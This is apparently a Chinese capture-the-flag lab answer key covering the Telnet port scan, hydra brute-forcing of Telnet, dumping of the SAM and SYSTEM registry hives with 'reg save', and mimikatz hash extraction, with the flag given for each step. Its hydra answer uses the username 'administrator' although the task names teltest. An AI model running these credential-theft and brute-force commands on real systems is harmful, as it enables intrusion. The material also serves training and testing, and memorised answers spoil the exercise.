需要环境私

1.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行系统服务及版本扫描渗透测试，并将该操作显示结果中 Telnet 服务对应的端口号作为FLAG提交；

 flag:23

2.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试，使用kali中 hydra 对服务器 Telnet 服务进行暴力破解（用户名为teltest），将hydra使用的必要参数当做 FLAG 进行提交（例：nmap -s -p 22）；（字典路径/usr/share/wordlists/dirb/small.txt）

flag:hydra -l administrator -P /usr/share/wordlists/dirb/small.txt 

3.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试，使用kali中 hydra 对服务器 Telnet 服务进行暴力破解（用户名为teltest），将破解成功的密码当做 FLAG 进行提交；（字典路径/usr/share/wordlists/dirb/small.txt）

flag:123 

4.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试，取得的账户密码有远程桌面权限，将该场景系统中 sam 文件使用reg 相关命令提取，将完整命令作为 FLAG 提交；

 靶机开启3389远程连接服务通过上面爆破出来的密码进行连接

flag: reg save HKLM\SAM sam.hive

5.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试，取得的账户密码有远程桌面权限，将该场景系统中 system 文件使用reg 相关命令提取，将完整命令作为 FLAG 提交；

 flag:reg save HKLM\SYSTEM system.hive

6.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试，将sam文件与 system 文件提取到本地，使用桌面 mimikatz 工具提取teltest密码信息，将提取信息的命令作为 FLAG 提交;

 桌面有个mimikatz文件夹右键里面使用管理员权限打开

 flag:lsadump::sam /sam:C:\sam.hive /system:C:\system.hive

7.通过本地 PC 中渗透测试平台 win7 对服务器场景进行渗透测试，将sam文件与 system 文件提取到本地，使用桌面 mimikatz 工具提取administrators密码信息，将提取到的 hash 值作为 FLAG 提交;

flag:3dbde697d71690a769204beb12283678